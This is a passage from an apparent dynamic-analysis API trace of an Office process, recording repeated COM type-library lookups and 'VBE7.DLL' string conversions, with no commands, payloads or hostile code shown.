pwOrdinal=0x500000000) returned 0x0 [0068.557] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143d50, pIndex=0x0 | out: ppTLib=0x143d50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.558] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143d60, pDummy=0x0 | out: ppTLibAttr=0x143d60, pDummy=0x0) returned 0x0 [0068.558] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.558] IUnknown:Release (This=0x665ba50) returned 0xb [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143d50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143d50, pbstrName=0x0, pwOrdinal=0x143d70 | out: pBstrDllName=0x143d50*=0x0, pbstrName=0x0, pwOrdinal=0x143d70*=0x3fe0) returned 0x0 [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000) returned 0x0 [0068.558] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143f50, pIndex=0x0 | out: ppTLib=0x143f50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.558] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143f60, pDummy=0x0 | out: ppTLibAttr=0x143f60, pDummy=0x0) returned 0x0 [0068.558] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.558] IUnknown:Release (This=0x665ba50) returned 0xb [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143f50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143f50, pbstrName=0x0, pwOrdinal=0x143f70 | out: pBstrDllName=0x143f50*=0x0, pbstrName=0x0, pwOrdinal=0x143f70*=0x41e0) returned 0x0 [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000) returned 0x0 [0068.558] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144410, pIndex=0x0 | out: ppTLib=0x144410*=0x665ba50, pIndex=0x0) returned 0x0 [0068.558] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144420, pDummy=0x0 | out: ppTLibAttr=0x144420, pDummy=0x0) returned 0x0 [0068.558] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.558] IUnknown:Release (This=0x665ba50) returned 0xb [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144410, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144410, pbstrName=0x0, pwOrdinal=0x144430 | out: pBstrDllName=0x144410*=0x0, pbstrName=0x0, pwOrdinal=0x144430*=0x46a0) returned 0x0 [0068.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000) returned 0x0 [0068.558] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144870, pIndex=0x0 | out: ppTLib=0x144870*=0x665ba50, pIndex=0x0) returned 0x0 [0068.558] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144880, pDummy=0x0 | out: ppTLibAttr=0x144880, pDummy=0x0) returned 0x0 [0068.559] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.559] IUnknown:Release (This=0x665ba50) returned 0xb [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144870, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144870, pbstrName=0x0, pwOrdinal=0x144890 | out: pBstrDllName=0x144870*=0x0, pbstrName=0x0, pwOrdinal=0x144890*=0x4b00) returned 0x0 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000) returned 0x0 [0068.559] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144c60, pIndex=0x0 | out: ppTLib=0x144c60*=0x665ba50, pIndex=0x0) returned 0x0 [0068.559] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144c70, pDummy=0x0 | out: ppTLibAttr=0x144c70, pDummy=0x0) returned 0x0 [0068.559] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.559] IUnknown:Release (This=0x665ba50) returned 0xb [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144c60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144c60, pbstrName=0x0, pwOrdinal=0x144c80 | out: pBstrDllName=0x144c60*=0x0, pbstrName=0x0, pwOrdinal=0x144c80*=0x4ef0) returned 0x0 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000) returned 0x0 [0068.559] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143d50, pIndex=0x0 | out: ppTLib=0x143d50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.559] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143d60, pDummy=0x0 | out: ppTLibAttr=0x143d60, pDummy=0x0) returned 0x0 [0068.559] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.559] IUnknown:Release (This=0x665ba50) returned 0xb [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143d50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143d50, pbstrName=0x0, pwOrdinal=0x143d70 | out: pBstrDllName=0x143d50*=0x0, pbstrName=0x0, pwOrdinal=0x143d70*=0x3fe0) returned 0x0 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000) returned 0x0 [0068.559] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143f50, pIndex=0x0 | out: ppTLib=0x143f50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.559] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143f60, pDummy=0x0 | out: ppTLibAttr=0x143f60, pDummy=0x0) returned 0x0 [0068.559] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.559] IUnknown:Release (This=0x665ba50) returned 0xb [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143f50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143f50, pbstrName=0x0, pwOrdinal=0x143f70 | out: pBstrDllName=0x143f50*=0x0, pbstrName=0x0, pwOrdinal=0x143f70*=0x41e0) returned 0x0 [0068.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000) returned 0x0 [0068.560] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144410, pIndex=0x0 | out: ppTLib=0x144410*=0x665ba50, pIndex=0x0) returned 0x0 [0068.560] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144420, pDummy=0x0 | out: ppTLibAttr=0x144420, pDummy=0x0) returned 0x0 [0068.560] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.560] IUnknown:Release (This=0x665ba50) returned 0xb [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144410, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144410, pbstrName=0x0, pwOrdinal=0x144430 | out: pBstrDllName=0x144410*=0x0, pbstrName=0x0, pwOrdinal=0x144430*=0x46a0) returned 0x0 [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000) returned 0x0 [0068.560] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144870, pIndex=0x0 | out: ppTLib=0x144870*=0x665ba50, pIndex=0x0) returned 0x0 [0068.560] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144880, pDummy=0x0 | out: ppTLibAttr=0x144880, pDummy=0x0) returned 0x0 [0068.560] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.560] IUnknown:Release (This=0x665ba50) returned 0xb [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144870, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144870, pbstrName=0x0, pwOrdinal=0x144890 | out: pBstrDllName=0x144870*=0x0, pbstrName=0x0, pwOrdinal=0x144890*=0x4b00) returned 0x0 [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000) returned 0x0 [0068.560] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144c60, pIndex=0x0 | out: ppTLib=0x144c60*=0x665ba50, pIndex=0x0) returned 0x0 [0068.560] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144c70, pDummy=0x0 | out: ppTLibAttr=0x144c70, pDummy=0x0) returned 0x0 [0068.560] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.560] IUnknown:Release (This=0x665ba50) returned 0xb [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144c60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144c60, pbstrName=0x0, pwOrdinal=0x144c80 | out: pBstrDllName=0x144c60*=0x0, pbstrName=0x0, pwOrdinal=0x144c80*=0x4ef0) returned 0x0 [0068.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000) returned 0x0 [0068.560] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143d50, pIndex=0x0 | out: ppTLib=0x143d50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.561] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143d60, pDummy=0x0 | out: ppTLibAttr=0x143d60, pDummy=0x0) returned 0x0 [0068.561] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.561] IUnknown:Release (This=0x665ba50) returned 0xb [0068.561] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143d50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.561] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143d50, pbstrName=0x0, pwOrdinal=0x143d70 | out: pBstrDllName=0x143d50*=0x0, pbstrName=0x0, pwOrdinal=0x143d70*=0x3fe0) returned 0x0 [0068.561] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000) returned 0x0 [0068.561] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143f50, pIndex=0x0 | out: ppTLib=0x143f50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.561] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143f60, pDummy=0x0 | out: ppTLibAttr=0x143f60, pDummy=0x0) returned 0x0 [0068.561] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.561] IUnknown:Release (This=0x665ba50) returned 0xb [0068.561] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143f50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.561] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143f50, pbstrName=0x0, pwOrdinal=0x143f70 | out: pBstrDllName=0x143f50*=0x0, pbstrName=0x0, pwOrdinal=0x143f70*=0x41e0) returned 0x0 [0068.561] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143f50, pwOrdinal=0x500000000) returned 0x0 [0068.561] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x144410, pIndex=0x0 | out: ppTLib=0x144410*=0x665ba50, pIndex=0x0) returned 0x0 [0068.561] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144420, pDummy=0x0 | out: ppTLibAttr=0x144420, pDummy=0x0) returned 0x0 [0068.561] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.561] IUnknown:Release (This=0x665ba50) returned 0xb [0068.561] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x144410, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144410, pbstrName=0x0, pwOrdinal=0x144430 | out: pBstrDllName=0x144410*=0x0, pbstrName=0x0, pwOrdinal=0x144430*=0x46a0) returned 0x0 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144410, pwOrdinal=0x500000000) returned 0x0 [0068.562] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144870, pIndex=0x0 | out: ppTLib=0x144870*=0x665ba50, pIndex=0x0) returned 0x0 [0068.562] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144880, pDummy=0x0 | out: ppTLibAttr=0x144880, pDummy=0x0) returned 0x0 [0068.562] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.562] IUnknown:Release (This=0x665ba50) returned 0xb [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144870, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144870, pbstrName=0x0, pwOrdinal=0x144890 | out: pBstrDllName=0x144870*=0x0, pbstrName=0x0, pwOrdinal=0x144890*=0x4b00) returned 0x0 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144870, pwOrdinal=0x500000000) returned 0x0 [0068.562] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144c60, pIndex=0x0 | out: ppTLib=0x144c60*=0x665ba50, pIndex=0x0) returned 0x0 [0068.562] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144c70, pDummy=0x0 | out: ppTLibAttr=0x144c70, pDummy=0x0) returned 0x0 [0068.562] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.562] IUnknown:Release (This=0x665ba50) returned 0xb [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144c60, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144c60, pbstrName=0x0, pwOrdinal=0x144c80 | out: pBstrDllName=0x144c60*=0x0, pbstrName=0x0, pwOrdinal=0x144c80*=0x4ef0) returned 0x0 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144c60, pwOrdinal=0x500000000) returned 0x0 [0068.562] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143d50, pIndex=0x0 | out: ppTLib=0x143d50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.562] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143d60, pDummy=0x0 | out: ppTLibAttr=0x143d60, pDummy=0x0) returned 0x0 [0068.562] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.562] IUnknown:Release (This=0x665ba50) returned 0xb [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143d50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143d50, pbstrName=0x0, pwOrdinal=0x143d70 | out: pBstrDllName=0x143d50*=0x0, pbstrName=0x0, pwOrdinal=0x143d70*=0x3fe0) returned 0x0 [0068.562] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143d50, pwOrdinal=0x500000000) returned 0x0 [0068.563] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143f50, pIndex=0x0 | out: ppTLib=0x143f50*=0x665ba50, pIndex=0x0) returned 0x0 [0068.563] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143f60, pDummy=0x0 | out: ppTLibAttr=0x143f60, pDummy=0x0) returned 0x0 [0068.563] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.563] IUnknown:Release (This=0x665ba50) returned 0xb [0068.563] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143f50, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.563] WideCharToMultiByte (in: CodePage=0x0, 